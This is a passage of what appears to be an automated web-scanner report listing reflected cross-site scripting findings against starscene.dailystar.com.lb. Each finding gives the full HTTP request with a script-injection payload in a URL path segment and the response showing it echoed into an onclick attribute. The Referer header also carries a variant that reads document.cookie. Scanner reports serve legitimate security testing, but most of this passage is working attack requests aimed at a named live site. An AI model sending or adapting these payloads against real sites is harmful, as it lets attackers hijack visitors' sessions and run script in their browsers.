The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a04e"><script>alert(1)</script>672ab228cd3 was submitted in the REST URL parameter 1. This input was echoed as 2a04e\"><script>alert(1)</script>672ab228cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content2a04e"><script>alert(1)</script>672ab228cd3/themes/options/library/js/options.js?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:36 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content2a04e\"><script>alert(1)</script>672ab228cd3/themes/options/library/js/options.js?ver=1.3'; }); return true;" >
...[SNIP]...

4.316. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/options/library/js/options.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d93"><script>alert(1)</script>10a8b64d52e was submitted in the REST URL parameter 2. This input was echoed as 93d93\"><script>alert(1)</script>10a8b64d52e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes93d93"><script>alert(1)</script>10a8b64d52e/options/library/js/options.js?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:17 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes93d93\"><script>alert(1)</script>10a8b64d52e/options/library/js/options.js?ver=1.3'; }); return true;" >
...[SNIP]...

4.317. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/options/library/js/options.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c154"><script>alert(1)</script>1d3042fa2f7 was submitted in the REST URL parameter 3. This input was echoed as 4c154\"><script>alert(1)</script>1d3042fa2f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/options4c154"><script>alert(1)</script>1d3042fa2f7/library/js/options.js?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:10:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:13 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/options4c154\"><script>alert(1)</script>1d3042fa2f7/library/js/options.js?ver=1.3'; }); return true;" >
...[SNIP]...

4.318. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/options/library/js/options.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77e75"><script>alert(1)</script>c8147f385f2 was submitted in the REST URL parameter 4. This input was echoed as 77e75\"><script>alert(1)</script>c8147f385f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/options/library77e75"><script>alert(1)</script>c8147f385f2/js/options.js?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/options/library77e75\"><script>alert(1)</script>c8147f385f2/js/options.js?ver=1.3'; }); return true;" >
...[SNIP]...

4.319. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/options/library/js/options.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9e93"><script>alert(1)</script>61762929006 was submitted in the REST URL parameter 5. This input was echoed as b9e93\"><script>alert(1)</script>61762929006 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/options/library/jsb9e93"><script>alert(1)</script>61762929006/options.js?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:39 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/options/library/jsb9e93\"><script>alert(1)</script>61762929006/options.js?ver=1.3'; }); return true;" >
...[SNIP]...

4.320. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/options/library/js/options.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a74"><script>alert(1)</script>a7ec7cfe43f was submitted in the REST URL parameter 6. This input was echoed as 41a74\"><script>alert(1)</script>a7ec7cfe43f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/options/library/js/options.js41a74"><script>alert(1)</script>a7ec7cfe43f?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:23 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/options/library/js/options.js41a74\"><script>alert(1)</script>a7ec7cfe43f?ver=1.3'; }); return true;" >
...[SNIP]...

4.321. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/facebox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bb02"><script>alert(1)</script>971f88f74ac was submitted in the REST URL parameter 1. This input was echoed as 8bb02\"><script>alert(1)</script>971f88f74ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content8bb02"><script>alert(1)</script>971f88f74ac/themes/shadow/facebox/facebox.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:06:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:06:43 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:06:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content8bb02\"><script>alert(1)</script>971f88f74ac/themes/shadow/facebox/facebox.css'; }); return true;" >
...[SNIP]...

4.322. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/facebox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64b69"><script>alert(1)</script>0aef2fe1fea was submitted in the REST URL parameter 2. This input was echoed as 64b69\"><script>alert(1)</script>0aef2fe1fea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes64b69"><script>alert(1)</script>0aef2fe1fea/shadow/facebox/facebox.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:20 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes64b69\"><script>alert(1)</script>0aef2fe1fea/shadow/facebox/facebox.css'; }); return true;" >
...[SNIP]...

4.323. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/facebox.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb56c"><script>alert(1)</script>cf98169985f was submitted in the REST URL parameter 3. This input was echoed as cb56c\"><script>alert(1)</script>cf98169985f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadowcb56c"><script>alert(1)</script>cf98169985f/facebox/facebox.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:58 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadowcb56c\"><script>alert(1)</script>cf98169985f/facebox/facebox.css'; }); return true;" >
...[SNIP]...

4.324. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/facebox.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465cc"><script>alert(1)</script>8b6764eb766 was submitted in the REST URL parameter 4. This input was echoed as 465cc\"><script>alert(1)</script>8b6764eb766 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/facebox465cc"><script>alert(1)</script>8b6764eb766/facebox.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:36 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/facebox465cc\"><script>alert(1)</script>8b6764eb766/facebox.css'; }); return true;" >
...[SNIP]...

4.325. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/facebox.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87596"><script>alert(1)</script>4c535a121ba was submitted in the REST URL parameter 5. This input was echoed as 87596\"><script>alert(1)</script>4c535a121ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/facebox/facebox.css87596"><script>alert(1)</script>4c535a121ba HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:18 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/facebox/facebox.css87596\"><script>alert(1)</script>4c535a121ba'; }); return true;" >
...[SNIP]...

4.326. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/facebox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f38a4"><script>alert(1)</script>d37d4df7c69 was submitted in the REST URL parameter 1. This input was echoed as f38a4\"><script>alert(1)</script>d37d4df7c69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentf38a4"><script>alert(1)</script>d37d4df7c69/themes/shadow/facebox/facebox.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:06:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:06:48 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:06:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

